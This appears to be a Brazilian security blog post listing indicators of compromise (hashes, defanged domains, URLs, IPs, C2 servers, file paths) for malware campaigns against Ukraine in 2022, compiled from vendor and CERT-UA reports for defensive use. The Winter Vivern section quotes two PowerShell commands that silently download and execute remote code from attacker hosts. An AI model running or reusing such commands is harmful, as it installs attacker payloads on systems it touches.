AnchisesLandia- Brazilian Security Blogger: [Segurança] Indicadores dos ciber ataques durante o conflito entre a Russia e Ucrânia

abril 07, 2022

[Segurança] Indicadores dos ciber ataques durante o conflito entre a Russia e Ucrânia

(Nota: Esse post foi suspenso e colocado sob revisão do Blogger sob suspeita de violação da política de comunidade do site ("Malware and Viruses policy") várias vezes. Este post é apenas uma coletânea de fatos técnicos sobre campanhas de malwares identificadoa durante o ciber conflito entre Russia e Ucrânia, incluindo seus indicadores técnicos, obtidos de fontes públicas e confiáveis, quando houver.

ESSE POST NÃO REPRESENTA PERIGO ALGUM!
Estas informações são usadas para PROTEGER as organizações.

Não há conteúdo malicioso sendo publicado aqui!

Note: This post was suspended and placed under review by Blogger staff, on suspicion of violating the site's community guidelines ("Malware and Viruses policy") many times. This post is just a collection of technical information and facts about the malware campaigns seen in the cyber conflict between Russia and Ukraine, including their technical indicators (IOCs), obtained from public and trustworthy sources, whenever they were available.

THIS POST OFFERS NO HARM AT ALL!
This information is to HELP organizations to PROTECT themselves.

There is no malicious content published here!)

Eu tenho acompanhado os aspectos de segurança desde o início desse triste conflito entre a Rússia e a Ucrânia, uma vez que a invasão russa foi precedida por alguns ciber ataques e acabou gerando diversas outras ações online.

Até o início de Abril, em 1 mês de conflito, já haviam sido identificados diversos malwares "wiper", um malware destinado a destruir dados e sistemas, utilizados em ciber ataques contra empresas e órgãos de governo da Ucrânia. Entre eles, alguns nomes que ficaram famosos, como o WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero e o AcidRain. Todo o acompanhamento, descritivo e linha do tempo com os diversos ciber ataques que ocorreram estão disponíveis nesse post: "Guerra cibernética na Ucrânia".

Para facilitar, eu preferi retirar do post original e destacar aqui a lista de indicadores de comprometimento (Indicators of compromise / IOCs) relacionados aos ciber ataques envolveram o uso de códigos maliciosos.

Segue abaixo alguns IOCs mais relevantes relacionados aos malwares envolvidos nos principais ciber ataques contra a Ucrânia:

WhisperGate e WhisperKill (divulgados pela Microsoft, CERT-UA, Secureworks e CISCO Talos)

No dia 13 de Janeiro foi identificada a ação de um malware "wiper", batizado de WhisperGate, que sobrescreve a Master Boot Record (MBR) do equipamento infectado e apresenta uma nota falsa de resgate, simulando um ransomware;
Hashs do stage1.exe (BootPatch / MBR Wiper): a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 (SHA-256) 189166d382c73c242ba45889d57980548d4ba37e (SHA-1) 5d5c99a08a7d927346ca2dafa7973fc1 (MD5)
Hash do stage2.exe (WhisperGate / Downloader): dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 (SHA-256) 16525cb2fd86dce842107eb1ba6174b23f188537 (SHA-1) 14c8482f302b5e81e3fa1b18a509289d (MD5)
Hashs do payload do Stage 3 (WhisperPack / Loader DLL): 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 (SHA-256) b2d863fc444b99c479859ad7f012b840f896172e (SHA-1) b3370eb3c5ef6c536195b3bea0120929 (MD5)
Hashs da DLL do Stage 3 (WhisperPack / Loader DLL): 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d (SHA-256) 82d29b52e35e7938e7ee610c04ea9daaf5e08e90 (SHA-1) e61518ae9454a563b8f842286bbdb87b (MD5)
Hash do Stage 4 (WhisperKill / File Wiper): 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 (SHA-256) a67205dc84ec29eb71bb259b19c1a1783865c0fc (SHA-1) 3907c7fbd4148395284d8e6e3c1dba5d (MD5)

HermeticWiper / KillDisk.NCV (descoberto pela ESET)

Em 23/02, um pouco antes do início da invasão russa, foi identificado um "wiper" batizado de HermeticWiper (ou FoxBlade);
1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 (SHA-256)
0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da (SHA-256)
a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e (SHA-256)
4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 (SHA-256)

Cyclops Blink (NCSC/UK)

Hash do arquivo cpd (sample 1): 50df5734dd0c6c5983c21278f119527f9fdf6ef1d7e808a29754ebc5253e9a86 (SHA-256)
Hash do arquivo cpd (sample 2): c082a9117294fa4880d75a2625cf80f63c8bb159b54a7151553969541ac35862 (SHA-256)
Hash do arquivo install_upgrade (sample 1): 4e69bbb61329ace36fbe62f9fb6ca49c37e2e5a5293545c44d155641934e39d1 (SHA-256)
Hash do arquivo install_upgrade (sample 2): ff17ccd8c96059461710711fcc8372cfea5f0f9eb566ceb6ab709ea871190dc6 (SHA-256)

IsaacWiper / Win32/KillMBR (ESET)

No dia 24/02, no dia do início da invasão russa e um dia depois do ataque pelo HermeticWiper, um novo malware atacou a Ucrânia, batizado de IsaacWiper pela ESET. A empresa divulgou essa descoberta em 01 de Março;
Arquivos:

cl64.dll: AD602039C6F0237D4A997D5640E92CE5E2B3BBA3 (SHA-1)
cld.dll: 736A4CFAD1ED83A6A0B75B0474D5E01A3A36F950 (SHA-1)
clean.exe: E9B96E9B86FAD28D950CA428879168E0894D854F (SHA-1)

Liberator / Disbalancer.exe (CISCO Talos)

Em 09/03 o grupo de pesquisadores do CISCO Talos divulgou a descoberta de um malware disfarçado como um software batizado de "Liberator", promovida como uma ferramenta para realizar ataques DDoS contra alvos de propaganda da Rússia. O objetivo era infectar os "soldados cibernéticos" pró-Ucrânia, roubando dados da máquina aonde for instalado
IP 95[.]142.46.35 - Porta 6666
33e5d605c1c13a995d4a2d7cb9dca9facda4c97c1c7b41dc349cc756bfc0bd67 (SHA-256)
f297c69795af08fd930a3d181ac78df14d79e30ba8b802666605dbc66dffd994 (SHA-256)
eca6a8e08b30d190a4956e417f1089bde8987aa4377ca40300eea99794d298d6 (SHA-256) (EXE)
705380e21e1a27b7302637ae0e94ab37c906056ccbf06468e1d5ad63327123f9 (SHA-256) (ZIP)

CaddyWiper / Win32/KillDisk.NCX (ESET)

No dia 14/03 a ESET noticiou a existência de um novo malware wiper atacando as redes das empresas da Ucrânia. Batizado de CaddyWiper, ele infecta servidores Windows;
98b3fb74b3e8b3f9b05a82473551c5a77b576d54 (caddy.exe)

DoubleZero (CISCO Talos e CERT-UA)

A partir do dia 17/03 as organizações ucranianas começaram a ser atacadas por mais um malware wiper distribuído através de ataques de spear-phishing, batizado de DoubleZero - conforme informado pelo CERT da Ucrânia em 23/03;
d897f07ae6f42de8f35e2b05f5ef5733d7ec599d5e786d3225e66ca605a48f53 (SHA-256) 36dc2a5bab2665c88ce407d270954d04 (MD5)
arquivo "csrss.zip": 8dd8b9bd94de1e72f0c400c5f32dcefc114cc0a5bf14b74ba6edc19fd4aeb2a5 (SHA-256) 989c5de8ce5ca07cc2903098031c7134 (MD5)
arquivo "cpcrs.exe": 3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe (SHA-256) 7d20fa01a703afa8907e50417d27b0a4 (MD5)
arquivo "csrss.exe": 30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a (SHA-256) b4f0ca61ab0c55a542f32bd4e66a7dc2 (MD5)

AcidRain (Sentinelone)

Em 24/02 um malware wiper batizado de AcidRain foi utilizado para desativar os modens utilizados pela rede de acesso internet via satélites KA-SAT da empresa Viasat;
9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a (SHA256)
86906b140b019fdedaaba73948d0c8f96a6b1b42 (SHA1)
ecbe1b1e30a1f4bffaf1d374014c877f (MD5)

PseudoSteel (CERT-UA)

Em. 28/03 o CERT da Ucrânia alertou sobre a distribuição de mensagem com o malware PseudoSteel, disfarçado de um arquivo com nome ""Information on the loss of servicemen of the Armed Forces of Ukraine.docx.exe."" (em ucraniano). O vírus rouba arquivos locais e os envia para um servidor FTP externo;
Arquivos:

"Інформація_щодо_втрат_військовослужбовців_ЗС_України.docx.exe": eda76ae28628c64d9e12a86adef6dc69 (MD5) 13eaa638d071e7dc124cf982b8777c6ef50a3d9dc8c57d22d23abe1bae5560f5 (SHA-256)
"googleupdate.exe": 878c30bdefb1b76ea10823a6d5a32f89 (MD5) bab351b5f19ecaa24eaa438dd93decd5587e0b441fc43b78893ca2e207b2cb2f (SHA-256)
"googleupdate.deupx.exe": 55cafceba527c3e68852b1af071929c0 78b492e211e91b1ef9a4bcd5ba80c9572545d5f3f63d3071e3253dcec3a5d97c
"Втрати-1001.docx": 5d29da2285390164a0a7d80e6ed23da7 (MD5) c50972c11ffd1da9e0ed670b99296f75ec52933699790285d050c0654c21fda3 (SHA-256)

GoMet (Cisco Talos)

arquivos:

"FctSec.exe": f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (SHA-256)
"SQLocalM86.exe": 950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SHA-256)

IP 111.90.139.122

GRIMPLANT e GRAPHSTEEL (Mandiant)

anexo ao e-mail de phishing (arquivo "Заборгованість по зарплаті.xls"): da305627acf63792acb02afaf83d94d1 (MD5)
arquivo "Base-Update.exe": 06124da5b4d6ef31dbfd7a6094fc52a6 (MD5)
arquivo "java-sdk.exe" (downloader): 36ff9ec87c458d6d76b2afbd5120dfae (MD5)
arquivo "oracle-java.exe" (GRIMPLANT backdoor): 4a5de4784a6005aa8a19fb0889f1947a (MD5)
arquivo "microsoft-cortana.exe" (GRAPHSTEEL infostealer): 6b413beb61e46241481f556bb5cdb69c (MD5)

SEABORGIUM (Microsoft)

cache-dns[.]com
cache-dns-forwarding[.]com
cache-dns-preview[.]com
cache-docs[.]com
cache-pdf[.]com
cache-pdf[.]online
cache-services[.]live
cloud-docs[.]com
cloud-drive[.]live
cloud-storage[.]live
docs-cache[.]com
docs-forwarding[.]online
docs-info[.]com
docs-shared[.]com
docs-shared[.]online
docs-view[.]online
document-forwarding[.]com
document-online[.]live
document-preview[.]com
documents-cloud[.]com
documents-cloud[.]online
documents-forwarding[.]com
document-share[.]live
documents-online[.]live
documents-pdf[.]online
documents-preview[.]com
documents-view[.]live
document-view[.]live
drive-docs[.]com
drive-share[.]live
goo-link[.]online
hypertextteches[.]com
mail-docs[.]online
officeonline365[.]live
online365-office[.]com
online-document[.]live
online-storage[.]live
pdf-cache[.]com
pdf-cache[.]online
pdf-docs[.]online
pdf-forwarding[.]online
protection-checklinks[.]xyz
protection-link[.]online
protectionmail[.]online
protection-office[.]live
protect-link[.]online
proton-docs[.]com
proton-reader[.]com
proton-viewer[.]com
relogin-dashboard[.]online
safe-connection[.]online
safelinks-protect[.]live
secureoffice[.]live
webresources[.]live
word-yand[.]live
yandx-online[.]cloud
y-ml[.]co

Dark Crystal RAT (DCRat) (Fortinet e CERT-UA)

arquivos:

03700E0D02A6A1D76ECAA4D8307E40F76E07284646B3C45693054996F2E643D7
24811E849A7A0E73788BC893BED81B88405883EB9114557EACD26A90C2A81C29
C84BBFCE14FDC65C6E738CE1196D40066C87E58F443E23266D3B9E542B8A583E

Sites e IPs:

72[.]167.223.219/MSDriverLoader.exe
203[.]96.191.70/MSDriverMonitor.exe
star-cz.ddns[.]net
103[.]27.202.127

Gamaredon (CISCO Talos Intelligence)

arquivo malicioso: 4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650
arquivos LNK:

581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a
34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c

arquivo RAR: 750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3
arquivo INFOSTEALER: 139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a
URLs maliciosas:

hxxp://a0698649.xsph[.]ru/barley/barley.xml
hxxp://a0700343.xsph[.]ru/new/preach.xml
hxxp://a0700462.xsph[.]ru/grow/guests.xml
hxxp://a0700462.xsph[.]ru/seek/lost.xml
hxxp://a0701919.xsph[.]ru/head/selling.xml
hxxp://a0701919.xsph[.]ru/predator/decimal.xml
hxxp://a0701919.xsph[.]ru/registry/prediction.xml
hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
hxxp://a0704093.xsph[.]ru/bass/grudge.xml
hxxp://a0705076.xsph[.]ru/ramzeses1.html
hxxp://a0705076.xsph[.]ru/regiment.txt
hxxp://a0705269.xsph[.]ru/bars/dearest.txt
hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
hxxp://a0705269.xsph[.]ru/prok/gur.html
hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
hxxp://a0705880.xsph[.]ru/band/sentiment.txt
hxxp://a0705880.xsph[.]ru/based/pre.txt
hxxp://a0705880.xsph[.]ru/selection/seedling.txt
hxxp://a0706248.xsph[.]ru/reject/headlong.txt
hxxp://a0707763.xsph[.]ru/decipher/prayer.txt

Drop sites:

hxxp://155.138.252[.]221/get.php
hxxp://45.77.237[.]252/get.php
hxxp://motoristo[.]ru/get.php
hxxp://heato[.]ru/index.php
hxxps://<random_string>.celticso[.]ru
IP 162[.]33.178.129
kuckuduk[.]ru
pasamart[.]ru
celticso[.]ru

Prestige (Microsoft)

Ransomware payload: 5dd1ca0d471dee41eb3ea0b6ea117810f228354fc3b7b47400a812573d40d91d (SHA-256)
Ransomware payload: 5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57 (SHA-256)
Ransomware payload: 6cff0bbd62efe99f381e5cc0c4182b0fb7a9a34e4be9ce68ee6b0d0ea3eee39c (SHA-256)
PE Import Hash: a32bbc5df4195de63ea06feb46cd6b55
File path of the ransom note: C:\Users\Public\README

CryWiper (Kaspersky) (em russo)

c:\windows\system32\browserupdate.exe (Trojan-Ransom.Win64.CryWiper.a): 14808919a8c40ccada6fb056b7fd7373
C&C: hxxp://82[.]221.141.8/IYJHNkmy3XNZ

"Trojanized Windows 10 Installer" (Mandiant)

ISO “Win10_21H2_Ukrainian_x64.iso”: b7a0cd867ae0cbaf0f3f874b26d3f4a4 (MD5)
Download site: https://toloka[.]to/t657016#1873175
Download site (Russian torrent tracker): https://rutracker[.]net/forum/viewtopic.php?t=6271208
BEACON C2s:

https://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn–
https://cdnworld[.]org/34702–general/sync/42823419-cdn

STOWAWAY C2s:

193.142.30[.]166:443
91.205.230[.]66:8443

Cloud Atlas (Checkpoint)

Domínios:

desktoppreview[.]com
gettemplate[.]org
driversolution[.]net
translate-news[.]net
technology-requests[.]net
protocol-list[.]com
comparelicense[.]com
support-app[.]net
remote-convert[.]com

IPs: 146.70.88[.]123 e 185.227.82[.]21
Documents, scripts and payloads (MD5):

a34d585f66fc4582ed709298d00339a9
b1aad1ed2925c47f848f9c86a4f35256
f58ad9ee5d052cb9532830f59ecb5b84
57c44757d7a43d3bc9e64ec5c5e5515d
41d2627522794e9ec227d72f842edaf7
f95ceca752d219dbc251cca4cd723eae
044e167af277ca0d809ce4289121a7b5
1139c39dda645f4c7b06b662083a0b9d
3399deafaa6b91e8c19d767935ae0908
bd9907dd708608bd82bf445f8c9c06ab
edc96c980bbc85d83dcd4dca49ca613f
ee671a205b0204fa1a6b4e31c9539771
5488781d71b447431a025bd21b098c2c
16fbbafa294d1f4c6c043d89138d1b60
5bbc3730c943b89673453176979d6811
b684f3ee5a316e7fbcfa95ebcf86dedc
ae74f2bfd671e11828a1ae040fe6d48c
2a21265df0bdd70a96551d9d6104b352
a8a93fa8ef221de5ee3d110cfc85243d
eb527d1682bfbed5d9346e721c38c6f5
ae828e3c03cc1aaedc43bb391e8b47ed
c7a1dd829b03b47c6038afa870b2f965
c2064c7f4826c46bc609c472597366fd
89d40dd2db9c2cfd6a03b20b307dcdec
d236d8fda2b7d6fd49b728d57c92a0a9
9b05080490d51a7d2806a0d55d75c7ff
d5a40e2986efd4a182bf564084533763
077b71298ce31832ae43e834b7e6c080
f68e64dacd046289d4222098ee421478
d236d8fda2b7d6fd49b728d57c92a0a9
81932933422d4bc4ece37472f9eb3ddc
d0d728856a91710df364576e05f2113e
94283807d0c97b3adb8f4ab45fffb5bc
0e9147b824bc1d2507984ccd2a36d507
dc3faa6840d1b5fd296d71ee8877254e
aa04bfcc675c73be1238fa953e19c4cf
789afbe3a173d13d0b3700da6a629e15
acbbc6fea0dbbe7cba511b450cc2b758
e79833c9f758775ba0d82b8f4c8d2981
3609ca3013d29fb824805b9a996eff70
956f2241e81345d6507d0cd43499dba1
a3ba37cde2644ed6345d2c74ce25bfd8
a7a004e7118c986f1e07c87ce52a60e5
b7b71b35fbfd119319015b04de817b3c
f29cbc7639b53003fb33d8b20b9c0b59

ANDROMEDA (Mandiant)

ANDROMEDA TrustedInstaller.exe: bc76bd7b332aa8f6aedbb8e11b7ba9b6
ANDROMEDA mskmde.com: b3657bcfe8240bc0985093a0f8682703
KOPILUWAK WinRAR SFX: 2eb6df8795f513c324746646b594c019
KOPILUWAK xpexplore.js: d8233448a3400c5677708a8500e3b2a0
QUIETCANARY 00c3df3b.exe: 403876977dfb4ab2e2c15ad4b29423ff
QUIETCANARY file.exe16: 8954caa2017950e0f6269d6f6168b796
UNC4210 ANDROMEDA C2

suckmycocklameavindustry[.]in
yelprope.cloudns[.]cl
anam0rph[.]su
212.114.52[.]24

UNC4210 KOPILUWAK C2: manager.surro[.]am
QUIETCANARY C2: 194.67.209[.]186:443

RansomBoggs (ESET)

F4D1C047923B9D10031BB709AABF1A250AB0AAA2
021308C361C8DE7C38EF135BC3B53439EB4DA0B4

DolphinCape (CERT-UA)

Arquivos:

shahed-136.rar:

247997c2b4431585f9355d3324410298
460244cbf353b15b52c69952dd3b2549d
e79c590c56807bc25d4896dd0016655

shahed.ppsx

241e4285a84be65cf16778462f06b9a8
5137a888271b08f388d863433e5f0f1b1
29e15d4c812b95c831e93e27ec45bd6

SearchEmbdIndex.ps1

3444e86aefa7bc2dbce34903f805400d
6ee62645cd97fb0b41fdf219b9a2a8211
324ded110b5c7f09b3d9881abb2a594

CodeMeter.exe

142893c48b76b7e9d0f7ce74e16aaf1f
2c1a2fe3fb418601f3adc9256e1ff2c50
9178483fdbb0e964f52fb6b30be1129

WibuCm32.dll (2022-09-24 06:09:32) (DolphinCape)

98c3d5347842743bfb4ade50b39226c1
772654b186ad9fbd0a80f03ceae7d327b
45c8944452cc39048160b1f6d8f2672

Redes:

morgunov.a@dsns.com.ua
195[.]123.237.147
202[.]157.187.190
dsns.com[.]ua
hXXp://195[.]123.237.147/manifests/win/WIBU/Manifest?r=rev1&role=
hXXp://202[.]157.187.190/cgi-bin/rarcheckcert[.]cgi/http/20221208011644645.stc

Hosts:

%LOCALAPPDATA%\Microsoft\msWIBU\
%LOCALAPPDATA%\Microsoft\msWIBU\CodeMeter.dat
%LOCALAPPDATA%\Microsoft\msWIBU\CodeMeter.exe
%LOCALAPPDATA%\Microsoft\msWIBU\WibuCm32.dll
%TMP%\mso\SearchEmbdIndex.ps1
SidebarWIBU- (part of the name of the scheduled task)
msoSearchEngineUA- (part of the name of the scheduled task)

Graphiron (Symantec)

Downloader.Graphiron: 0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63 (SHA-256)
Downloader.Graphiron: 878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db (SHA-256)
Infostealer.Graphiron: 80e6a9079deffd6837363709f230f6ab3b2fe80af5ad30e46f6470a0c73e75a7 (SHA-256)
Infostealer.Graphiron: eee1d29a425231d981efbc25b6d87fdb9ca9c0e4e3eb393472d5967f7649a1e6 (SHA-256)
Infostealer.Graphiron: f0fd55b743a2e8f995820884e6e684f1150e7a6369712afe9edb57ffd09ad4c1 (SHA-256)
Infostealer.Graphiron: f86db0c0880bb81dbfe5ea0b087c2d17fab7b8eefb6841d15916ae9442dd0cce (SHA-256)
Network: 208.67.104[.]95 — C&C server

Winter Vivern (CERT-UA)

Arquivos:

Забезпечення кібербезпеки.html: 93beb3454664314826a843ae28befe96 - b10bc0bb30b3c1d0c404d3a902ccebc425f23cb5a66c02104739f226c77b5816
Protector.bat: 42b6b2533135574ac8a2027df465b295 - 05457a790782542d3f16c9b8368a077b458ff7349856e6da541223a51e94b9c8
fjasmngptwq95824s.php: 4d6eac0b0dd1adc47d81b163d03e5f4b - 91e9325dd4972c0d40becfff6e65399c46aeb210a3b9a1f75d453cc8fe87d09c
LG5362s5215098-xvbxzcnsaf4lmsa.php: a03cb9a28fa5ce72354e1556731a68d4 - cf919033a2a4f76a4b78499be027090a0a7980a2f536df53eebb2140478abeb7
fx64g15g.xml: 4d549fa15eadeefd30f5269a2b3995c4 - 521c8345351144437033b41dfb5e4878c3b3a7ade4e2d0ccdcc5699d0b4d3ac6
9f5fe4bab163de5eedb995beed21c75578284fa4.php: 7ffb80d87ab0fe5e2c7f7338ec22a7b0 - 3442724f36fcaa1822bdafc3417e6bc7488898c4acbc73f0114ffeb6a3604164
62d4677fcf600ac0c4933bd80dec255868827e00.php: ed7bb4cc6dd1079efbe4bc3ceffd4250 - d8236c841b07c933d4de0ef9ed854902f6aae73b83137d9ffbe29fb879aa094f
62d4677fcf600ac0c4933bd80dec255868827e00.dec.ps1: 9997462826c26ab82a29e1c0712bbbb5 - 2708b9f8a196c50c8c6d6001af5b02e3c5d113e1977a686319eae7652ecbc1d3
Protector.bat: 6fe2a60e3f4c15c60128562d006696b6 - 72028cff34d33e26bf01e4bf63c8b977ece33b3809bd6dd075bcff343895dc4b

Host-based:

%APPDATA%\XmlSchemaMicrosoftXsd.xml
%APPDATA%\XmlSchemaMicrosoftXsdO.xml
%PUBLIC%\MicrosoftUpdateClient\
%PUBLIC%\MicrosoftUpdateClient\Microsoft_update_tool_%NUM%.dat
powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://bugiplaysec[.]com/fjasmngptwq214.php')"""
powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://troadsecow[.]com/fjasmngptwq95824s.php')""" Client_Update_Microsofts-{ITCUNTH-9D12-4RE1-8BWD-6HFI2D4FNI1I2}

Network-based:

hXXps://bugiplaysec[.]com/ssu.gov.ua/
hXXps://ocspdep[.]com/ssu.gov.ua/
hXXp://troadsecow[.]com/policja.gov.pl
hXXps://troadsecow[.]com/cbzc.policja.gov.pl
hXXps://troadsecow[.]com/mfa.gov.ua/
hXXps://troadsecow[.]com/mfa.gov.ua/downloadapp.php
hXXps://troadsecow[.]com/
hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_.php
hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_1.php hXXps://bugiplaysec[.]com/fjasmngptwq214.php
hXXps://troadsecow[.]com/fjasmngptwq95824s.php
hXXps://troadsecow[.]com/gkaslnwqpasg/fx64g15g.xml
hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/59948e7126a2927a53af0593f85dad2f5ae5c6e0.php
hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/62d4677fcf600ac0c4933bd80dec255868827e00.php
hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/9f5fe4bab163de5eedb995beed21c75578284fa4.php
hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php
hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php?idu=%SID%
ocspdep[.]com
troadsecow[.]com
bugiplaysec[.]com
176[.]97.66.57 AE @iroko.net
195[.]54.170.26 NO @iroko.net
45[.]136.198.141 BG @iroko.net
80[.]79.119.239 GB @wavecom.ee (@3nt.com)

GammaLoad, GammaSteel (CERT-UA - veja o alerta para mais IOCs)

Arquivos:

Порядок денний на 04.08.2022.docx: 136bd98383e5b3e06b63f2d7c72a3d4d - 81d8c20a19e1c2c3e5bfd6f8a39499321f42b07f6b94c9e0bb98fd6cfd4355a8
Порядок денний на 04.08.2022.docx: 82e0e0838c6c8abf103d4e5dab78b703 -f2f6077597d1fdb84bbb35aebd169af522767bc3a6aae58e778c429626f376a3
faithfully.nab: 1bba824db40a7ce52313ed76b55ac5fd - f628fa53fc3f91c1d812246291b3a188904ab091c735e8dc7ed644103a0eb5c6
Normal.dotm: 897c859e25576146f4e03329f076bd40 - 2cb17eb3450b4cfad148427986410cda69d47a124a7dea43c577a55569ff3761
Wikipedia Search Tools: 9da690670ff22a610f632251538888c4 - 2dfef7c52c05c3b88818edd7764ef1f1d41c1450918441e6a5d8b1518b80ac3e
autowake: db5606f0010bb7fdc1e10174055b0f93 - 968f841df2fd5b7458d15569b756088691e6d4a04e5f6f22df1c773e1fe35129
MsCtfMonitor: a73326f0373131fdd4814b9fc67c7e34 -c82728665fafb66828f3fe2d9ee28b2e670e958abc1f5dda6c5e460db2502207
ScheduledDefrag: 7d200a3eb82b9b3c60daa0866f9b6db9 - 6cccc179db19c405cc313f60d3bb09e00f7b273ec3c6ddf03ae4cba3fcac961d
winsparcontrols: 904803767f7d3c8f2f947f40f8ba6272 -afcb200cf4a646397f67c37d396cd5573db2575ae945b3251dfb6d285d1e6724
regidlebackup: 9db94f4c9dba8adb2c13f1962c1fcaa6 -f1f4ed4122564c90b473617d9989a2a90af1d93c4b75c8cfecd564ff71f803a0
КОРЗИНА.LNK: 7f0270c87e1d14d95c51cd303dbab195 - bcb63de0b16c449b054982ad1d4c23810a396e061ae45801df4d64acf4e82674
НЕ СМОТРЕТЬ.LNk: 6c6fbdd3dcf6919d6d2aff8065892b2c - 1b59868b460359f46c6ae0a01b6f34c89a33b79992a03573fc40bd3c501cbea4
ПОРНО.lNK: 66d7796b61ddac70f748cbc1ff26dfef - 00fe49d9fde36aace2e9c35962ac11f8595b8452d84ba02f4511754ced831d66
НА ДОКЛАД.lNK: 949d29f97c11abeab41075bf2a6e9dfd - 6f2004a5b3f4f1c84c0e0e08181cfb8bbc0f50617e58d57cecddf4789587880a
МОИ ФОТО.LNk: 94031409d9f552e174dcc66e2b3bd45b - 564aba6e5366347b1e522b2af7a46fa54e6d23af4ce17b2dd3a5d45d925c7aa4
РАЗОБРАТЬ.lnk: 54cfc650263a61a5c372dd8b4fa6e9e5 - 788dc18de55d73027011a0b109b4b795e6ae485bdda7dd07deecab6af386170c
ФОТО.lnk: b8686b1038a1f4c162c1f0454169fec8 - 7d2c607bb9627e14d572356ff653b587ea0d7f7b2c1f4ab45bb979b81f9369ae
ХЛАМ.lNK: a34a506a965669daf00075c5a22f7187 - 24fe5b916433ae295685dddcc5c808fb4cd3d3a2c3d999b721f4e650773b1ed4
index.txt: f046e20e2429a47194cf7cb76db1dfd2 - c19dbecf59908f530a63705af62a3596531f7eecbb971a2926670fb4c0697a2c
index.php: e45eeb97da3155179fb1c626ae930eda - 79c340f1d8c78b96d4e92a78d9c407494769df79ab491dfe2b1955f26af4e388
joyful: 7622a8f0bb0b97e17e186758f730af2d - 143cc8dade3ac835c9114333e05544b52dc57a1273cbdd4aca38253a710c92ab
judge (LNK-dropper): afa8f2b0ea413c568549360e8dfebe0a - 6cb0ef2538cd074fbcccca5a96bb21538529220eeeeaca63e06a18cbbc6a9eb4
jump: ea8c0a9bccd9fd91b78e06a2a58b559b - 430206ba1fbd0c869b71608ad1808febfb067e086d0b330225b5afcddc1af352
NTUSER.DAT.TMContainer.f4v: c5ab39da6f015a26edb916a0e37b9d57 - c172c8733c92d914574290eb46d8a6c1b49387d8d4dceafc3e13d953395c9710
definite.bmp: b6840f52a5c655d22c70f14333238409 - 1928ea04a52ea5ced87305cc001e693385ecbb8d3b4c64c1288d4b223de841dd
dependant.bmp: 7e5ea867d5f4ed45dd26e304cef98678 - 452d40893e9973ec5e4779ea830320d80999b09a36113b7d86de866a02823a3c
dentist.bmp: 859278e356de512859cd5bb94d09e9e4 - dcb69e1c9a6bff950481cf1f493b3e9665133e9afae528f0d38d72e83607a6d0
define.bmp: df887652a92d1103d5131aa68757b2cc - 9b81fbe9f7157e7873862fe7fabd9df5fdb8197bf1cc01b5e34cbebf5ff0de13
defeat.bmp: 83b3fd87ee87be5708326f99d4db3bbd - f96489503934b654e00cbd0c48845d66aaf3b91f5bd53fd05d7ecfc48a66dc20
decay.bmp: ffb49d24a6691bdb3f5f58a632ac4447 - 1113fc222132460fe481ed0a62fb3fe1426bc920cdb01d334c7a7a6ef952dfee
declared.bmp: 396606ccd506b565d8590cae99be4950 - 7e3cfa63b31ed9e4606e43b29a704924a27b62d6b9a1360b462d9998deed549f
